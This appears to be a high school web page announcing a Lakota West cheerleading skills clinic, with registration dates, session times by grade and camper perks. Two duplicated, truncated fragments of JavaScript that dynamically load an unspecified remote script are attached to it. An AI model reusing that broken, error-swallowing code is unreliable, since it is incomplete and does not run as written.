Fall Cheer
Future Firebird Cheer Clinic on Saturday, August 21st!
NOTE: Registration will begin on July 1st-August 5th.
Flyer found here>> CheerClinicFlyer
Come join the Lakota West cheerleaders for a cheer skills clinic for all ages!
Campers receive a t-shirt, bow and poms to keep and use at Future Firebird Night – Sept 10th.
TIMES:
2:00-4:00 K-5th grade
Check-in starts at 1:30
4:30-7:00 6-8th grade
Check-in starts at 4:00
**All campers are invited to cheer 1st quarter of varsity game on Friday, Sept. 10th**
CAMPERS WILL GET IN FREE, PARENTS MUST PURCHASE A TICKET
Questions about registering, please contact us at lakotawestcheerleading@yahoo.com
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();